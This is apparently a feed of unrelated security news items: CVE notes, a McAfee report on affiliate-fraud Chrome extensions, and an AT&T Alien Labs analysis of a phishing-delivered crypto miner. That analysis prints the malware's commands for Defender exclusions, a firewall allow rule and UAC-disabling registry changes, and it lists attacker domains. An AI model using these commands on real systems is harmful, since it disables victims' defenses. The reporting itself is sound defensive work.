IBM Engineering Test Management 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210671.
In oauth2-server (aka node-oauth2-server) through 3.1.1, the value of the redirect_uri parameter received during the authorization and token request is checked against an incorrect URI pattern (“[a-zA-Z][a-zA-Z0-9+.-]+:”) before making a redirection. This allows a malicious client to pass an XSS payload through the redirect_uri parameter while making an authorization request. NOTE: this vulnerability is similar to CVE-2020-7741.
Authored by Oliver Devane and Vallabh Chole
A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000
The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage
Apart from offering the intended functionality, the extensions also track the user’s browsing activity. Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.
The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.
The 5 extensions are
Name
Extension ID
Users
Netflix Party
mmnbenehknklpbendgmgngeaignppnbe
800,000
Netflix Party 2
flijfnhifgdcbhglkneplegafminjnhn
300,000
FlipShope – Price Tracker Extension
adikhbfjdbjkhelbdnffogkobkekkkej
80,000
Full Page Screenshot Capture – Screenshotting
pojgkmkfincpdkdgjepkmdekcahmckjp
200,000
AutoBuy Flash Sales
gbnahglfafmhaehbdmjedfhdmimjcbed
20,000
This section contains the technical analysis of the malicious chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.
The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites.
The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.
Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.
Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:
Variable
Description
Ref
Base64 encoded referral URL
County
The county of the device
City
The city of the device
Zip
The zip code of the device
Apisend
A random ID generated for the user.
Name
Base64 encoded URL being visited
ext_name
The name of the chrome extensions
The random ID is created by selecting 8 random characters in a character set. The code is shown below:
The country, city, and zip are gathered using ip-api.com. The code is shown below:
Upon receiving the URL, langhort.com will check if it matches a list of websites that it has an affiliate ID for, and If it does, it will respond to the query. An example of this is shown below:
The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains.
Two of the functions are detailed below:
If the result is ‘c’ such as the one in this blog, the extension will query the returned URL. It will then check the response and if the status is 200 or 404, it will check if the query responded with a URL. If it did, it would insert the URL that is received from the server as an Iframe on the website being visited.
If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.
The images below show the step-by-step flow of events while navigating to the BestBuy website.
The user navigates to bestbuy.com and the extension posts this URL in a Base64 format to d.langhort.com/chrome/TrackData/
Langhort.com responds with “c” and the URL. The “c” means the extension will invoke the function passf_url()
passf_url() will perform a request against the URL
the URL queried in step 3 is redirected using a 301 response to bestbuy.com with an affiliate ID associated with the Extension owners
The extension will insert the URL as an Iframe in the bestbuy.com site being visited by the user
Shows the Cookie being set for the Affiliate ID associated with the Extension owners. They will now receive a commission for any purchases made on bestbuy.com
Here is a video of the events
We discovered an interesting trick in a few of the extensions that would prevent malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity. This was done by checking if the current date is > 15 days from the time of installation.
This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.
McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.
The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog
McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.
The Malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.
Type
Value
Product
Detected
Chrome Extension
Netflix Party – mmnbenehknklpbendgmgngeaignppnbe
Total Protection and LiveSafe
JTI/Suspect
Chrome Extension
FlipShope – Price Tracker Extension – adikhbfjdbjkhelbdnffogkobkekkkej
Total Protection and LiveSafe
JTI/Suspect
Chrome Extension
Full Page Screenshot Capture
pojgkmkfincpdkdgjepkmdekcahmckjp
Total Protection and LiveSafe
JTI/Suspect
Chrome Extension
Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn
Total Protection and LiveSafe
JTI/Suspect
Chrome Extension
AutoBuy Flash Sales gbnahglfafmhaehbdmjedfhdmimjcbed
Total Protection and LiveSafe
JTI/Suspect
URL
www.netflixparty1.com
McAfee WebAdvisor
Blocked
URL
netflixpartyplus.com
McAfee WebAdvisor
Blocked
URL
flipshope.com
McAfee WebAdvisor
Blocked
URL
goscreenshotting.com
McAfee WebAdvisor
Blocked
URL
langhort.com
McAfee WebAdvisor
Blocked
URL
Unscart.in
McAfee WebAdvisor
Blocked
URL
autobuyapp.com
McAfee WebAdvisor
Blocked
The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.
rubygem-puma-4.3.6-5.fc35
Fix CVE-2022-23634 – information leak between requests.
Fix CVE-2022-24790 – http request smuggling vulnerabilities
The NSA has has published criteria for evaluating levels of assurance required for DoD microelectronics.
The introductory report in a DoD microelectronics series outlines the process for determining levels of hardware assurance for systems and custom microelectronic components, which include application-specific integrated circuits (ASICs), field programmable gate arrays (FPGAs) and other devices containing reprogrammable digital logic.
The levels of hardware assurance are determined by the national impact caused by failure or subversion of the top-level system and the criticality of the component to that top-level system. The guidance helps programs acquire a better understanding of their system and components so that they can effectively mitigate against threats.
The report was published last month, but I only just noticed it.
Six hundred malicious email campaigns made their way across the internet in the first half of 2022
The group’s main goal is to monitor foreign adversaries who may interfere with elections
Facebook parent Meta Platforms agreed Friday to settle a class action lawsuit seeking damages for allowing British political consulting firm Cambridge Analytica access to the private data of tens of millions of Facebook users. The settlement will spare CEO Marc Zuckerberg an embarrassing court appearance to defend his company.
Lawyers acting for the plaintiffs and for Facebook filed a joint request with the US District Court for the Northern District of California on Friday, asking the judge to put the class action on hold for sixty days while the two parties finalized a written settlement for an as-yet undisclosed amount. The high profile lawsuit has been running for over four years and claims that Facebook shared data of millions of US voters with Cambridge Analytica.
rubygem-puma-5.5.2-3.fc36
Fix CVE-2022-23634 – information leak between requests.
Fix CVE-2022-24790 – http request smuggling vulnerabilities.
Crypto miners are determined in their objective of mining in other people’s resources. Proof of this is one of the latest samples identified with AT&T Alien Labs, with at least 100 different loaders and at least 4 different stages to ensure their miner and backdoor run smoothly in the infected systems.
Key takeaways:
Attackers have been sending malicious attachments, with a special emphasis on Mexican institutions and citizens.
The techniques observed in these samples are known but still effective to keep infecting victims with their miners. Reviewing them assists in reminding defenders the current trends and how to improve their defenses.
The wide variety of loaders in conjunction with the staged delivery of the miner and backdoor malwares, shows how determined the attackers are to successfully deliver their payloads.
Crypto miners have been present in the threat landscape for some years, since an attacker identified the opportunity of leveraging victim’s CPUs to mine cryptocurrencies for them. Despite the current rough patch in the world of cryptocurrencies, these miners are still present and will be in the foreseeable future.
As seen in the current analysis, unlike IoT malwares, which also attempt to reach the biggest number of infected devices as possible, these miners target victims through phishing samples. The techniques used by these malwares are usually focused on reaching execution, avoiding detection to run under the radar and gaining persistence to survive any reboot.
A new miner sample showed up in April on AT&T Alien Labs radar, with a wide range of different loaders aiming to execute it in infected systems up to this day. The loaders were initially delivered to the victims through an executable disguised like a spreadsheet. For example, one of the samples (fd5131645025e199caa142c12cef34b344437a0f58306f9b66c35d32618665ba) carries a Microsoft Excel icon, but its file extension corresponds to an executable.
A wide range of decoy documents were found associated with this miner, many of them associated with Mexican civilians: exam results, dentist results, Mexican Governmental documents, Mexican Social Security, Tax returns, etc. Figure 1 corresponds to one of the spreadsheets observed. The campaign identified in this report materialized most of its attacks during the second half of June 2022. For example, the mentioned file above was compiled in late May 2022 and was first observed in the wild a month after, on June 20, 2022.
Figure 1. Decoy spreadsheet ‘ppercepciones anuales.xlsx’.
At the time of execution, the first activities performed are registry changes to cloak the malware samples. For example, by setting ‘HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt’ to 1, the attackers are hiding the file extensions and camouflaging the executables as documents. Additionally, the registry key ‘HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden’ is set to 0 to avoid displaying in explorer the hidden files dropped during execution. Finally ‘ HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemConsentPromptBehaviorAdmin’ is set to 0 in order to execute any future samples with elevated privileges without explicit consent in the form of a pop up or inserting credentials.
The initial payload drops another executable file while opening the spreadsheet in Figure 1. This additional executable attempts to look like a legitimate executable. It is named ‘CmRccService.exe’ and has the same filename as the metadata associated with the product’s name, description and comments. It is probably an attempt to masquerade the process by making it similar to the legitimate Microsoft process ‘CmRcService.exe’ (Configuration Manager Remote Control Service) (T1036.004). However, the legitimate files owned by Microsoft would have been signed with Microsoft certificate, which is not the case for these files – which have not been signed at all.
Pivoting by this indicator, returns over a hundred different samples that have been created and delivered during the last three months, most of them in the last weeks. In addition to the product name ‘CmRccService.exe’, a similar decoy name was observed in this campaign ‘RegistryManager.exe’, which showed up in at least 6 different samples. The RegistryManager samples even carry a Copyright flag associated with Microsoft Corporation, lacking once again the corresponding file signature. These files are allocated under the folder ‘C:WindowsImmersiveControlPanel’ in an attempt to make the processes look as legitimate as possible.
Persistence of the whole process is attempted during the execution of ‘CmRccService.exe’. A new service is registered in the system (T1543.003), to be run with highest privileges each time the user logs on.
Figure 2. Persistence mechanism.
This loader reaches out to several domains hosting the payloads for next stages, configuration files and one-line commands to be executed.
One of these domains is ‘bekopgznpqe[.]is’. Initially created on February 22, 2022 with the name server 1984 Hosting Company, who offers domain names registration free of charge. However, since this behavior indicator makes the domain look suspicious to security companies, the domain was moved to Cloudflare on April 21 (a different nameserver with a better reputation due to its popularity and absence of free offerings). This technique has historically been used to improve the reputation of domains right before they are used during a campaign.
Additionally, the malware attempts to contact a supplemental domain ’dpwdpqshxux[.]ru,’ which does not yet resolve but was created on February 21, 2022, a day before ‘bekopgznpqe’ domain. There is no historical data of it ever resolving to any IP. For this reason, the domain is probably a backup plan, to be used if the first stops working.
The third and last domain identified during analysis did not follow the above pattern. The domain ‘2vkbjbpvqmoh[.]sh‘ was created in January 2022 in the Njalla name server, known and marketed as a great offering for ‘Privacy as a Service’ for domains and VPNs. After some time operating, the domain was marked for deletion in May 2022.
Before executing the third stage payload, Cmrcservice performs several modifications to the FireWall to allow inbound and outbound connections to the files it will drop afterwards. The executed command for these changes is ‘’C:WindowsSystem32cmd.exe’ /C powershell New-NetFirewallRule -DisplayName ‘RegistryManager’ -Direction Inbound -Program ‘C:WindowsImmersiveControlPanelRegistryManager.exe’ -Action Allow’.
Furthermore, the malware includes exclusions to the Microsoft Windows Defender for the folders from where the malware will be executing or the files it intends to execute (T1562). The command used for this purpose is ‘powershell.exe $path = ‘C:WindowsBrandingoidz.exe’ ; Add-MpPreference -ExclusionPath $path -Force’. The excluded folders and files include:
C:Users
C:Windows
C:WindowsTemp
C:WindowsImmersiveControlPanel
C:WindowsImmersiveControlPanelCmRccService.exe
C:WindowsBranding
C:WindowsBrandingumxn.exe
C:WindowsBrandingoidz.exe
C:WindowsHelpWindows
C:WindowsHelpWindowsMsMpEng.exe
C:WindowsIME
The third stage payload is formed by the ‘p.exe’ executable, which doesn’t hide its contents, since the file’s metadata claims the filename is ‘payload.exe’. During execution, p drops two additional files: ‘oidz.exe‘ and ‘umxn.exe’, which correspond to the final payloads. Figure 3 recaps the execution flow until this point.
Figure 3. Execution tree.
‘Oidz.exe‘ runs an infinite loop, as seen in Figure 4, that will reach out to the Command & Control (C&C) looking for new commands to execute. After execution, it includes a sleep command to separate the requests for additional commands as well as its executions. In other words, this executable corresponds to the backdoor installed in the system.
The commands to be executed are uploaded by the attackers to the C&C servers, and oidz reaches out to specific files in the server and executes them, allowing the attackers to maintain any payload updated or modify its capabilities (T1102.003). This file does not aim to be persistent in the system since the grandparent process ‘Cmrcservice.exe’ already is. The C&C servers list seen in Figure 5, has a first parameter corresponding to the command to execute, while the second parameter corresponds to the flag of the command to be executed. This list of domains corresponds to the one used previously by ‘CmRccService’.
Figure 4. Oidz infinite loop.
Figure 5. C&C list.
Finally, ‘umxn.exe’ corresponds to the crypto miner that will run with the configuration pulled from one of the C&C and stored in ‘%windir%HelpWindowsconfig.json’. All the other files were preparing the environment for the miner, avoiding issues with execution, network communications or enabling modifications during the execution with the backdoor.
Since it was first observed in April 2022, some of the executables have changed names or had some variations but have been excluded throughout the report to avoid confusion. The execution line in this report and observed in Figure 3 is the most common one observed. One of the most remarkable mentioned variations, include file ‘MsMpEng.exe’ or ‘McMpEng.exe’, which is an additional stage executed by ‘umxn.exe’. This sample claims in its PE metadata to be ‘Antimalware Service Executable’ to disguise its true nature.
Figure 6. MsMpEng.exe metadata.
AT&T Alien Labs has provided an overview on an ongoing crypto mining campaign that caught our eye due to the big number of loaders that have shown up during the month of June, as well as how staged the execution is for a simple malware like a miner. Alien Labs will continue to monitor this campaign and include all the current and future IOCs in the pulse in Appendix B.
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.
TYPE
INDICATOR
DESCRIPTION
SHA256
fd5131645025e199caa142c12cef34b344437a0f58306f9b66c35d32618665ba
ppercepciones anuales.xlsx
SHA256
00ba928455d7d8a92e5aeed3146925086c2451501e63a0d8ee9b7cbaaf1007de
CmRccService.exe
SHA256
8f0dc8c5e23ee42209e222db5a8cf8ee6e5d10b5dde32db5937d4499deef0302
RegistryManager.exe
SHA256
f77522d8476969ae13f8823b62646a9f2cec187e2d0e55298389b8ced60dd0c8
p.exe
SHA256
ec4c48ac55139c6e4f94395aca253d54e9bbc864cc0741f8e051d31cd7545620
umxn.exe
SHA256
c0dc67bfcefa5a74905f0d3a684e7c3214c5b5ca118e942d2f0cc2f53c78e06c
oidz.exe
SHA256
18493e0492eb276af746e50dee626f4d6a9b0880f063ebb77d8f3b475669bf65
Sample miner configuration
DOMAIN
2vkbjbpvqmoh[.]sh
Malware and config server
DOMAIN
bekopgznpqe[.]is
Malware and config server
DOMAIN
dpwdpqshxux[.]ru
Unresolved domain
The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:
TA0001: Initial Access
T1566: Phishing
T1566.001: Spearphishing Attachment
TA0002: Execution
T1059: Command and Scripting Interpreter
T1059.001: PowerShell
T1059.003: Windows Command Shell
T1204: User Execution
T1204.002: Malicious File
T1569: System Services
T1569.002: Service Execution
TA0003: Persistence
T1543: Create or Modify System Process
T1543.003: Windows Service
TA0004: Privilege Escalation
T1543: Create or Modify System Process
T1543.003: Windows Service
TA0005: Defense Evasion
T1027: Obfuscated Files or Information
T1027.002: Software Packing
T1036: Masquerading
T1036.004: Masquerade Task or Service
T1562: Impair Defenses
T1562.001: Disable or Modify Tools
T1562.004: Disable or Modify System Firewall
TA0011: Command and Control
T1102: Web Service
T1102.003: One-Way Communication
TA0040: Impact
T1496: Resource Hijacking
TA0042: Resource Development
T1583: Acquire Infrastructure
T1583.006: Domains
[1]EXE icon by Icons8; Cog icon by Icons8; XLS icon by Icons8
